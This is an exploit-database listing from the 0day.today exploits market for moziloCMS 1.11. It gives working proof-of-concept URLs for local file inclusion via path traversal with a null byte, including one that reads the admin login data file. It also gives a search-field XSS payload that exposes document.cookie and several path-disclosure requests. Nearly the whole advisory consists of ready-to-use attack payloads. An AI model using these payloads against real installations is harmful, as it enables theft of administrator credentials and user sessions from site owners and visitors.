[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

moziloCMS 1.11 (LFI/PD/XSS) Multiple Remote Vulnerabilities

Author
SirGod
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5018
Category
web applications
Date add
09-04-2009
Platform
unsorted
===========================================================
moziloCMS 1.11 (LFI/PD/XSS) Multiple Remote Vulnerabilities
===========================================================


###############################################################################################

[+] Local File Inclusion

 PoC 1 :

   http://127.0.0.1/index.php?cat=10_Willkommen&page=../../../../../BOOTSECT.BAK%00

 PoC 2 :

   http://127.0.0.1/index.php?cat=10_Willkommen&page=../../admin/conf/logindata.conf%00

[+] Cross Site Scripting

 PoC :

   http://127.0.0.1/index.php?action=search&query=<script>alert(document.cookie)</script>

[+] Path Disclosure

 PoC's :

   http://127.0.0.1/gallery.php?gal[]=moziloCMS
   http://127.0.0.1/index.php?cat=10_Willkommen&page[]=10_Willkommen
   http://127.0.0.1/index.php?cat[]=10_Willkommen&page=10_Willkommen
   http://127.0.0.1/download.php?cat=10_Willkommen&file[]=text.txt

###############################################################################################



#  0day.today [2024-11-15]  #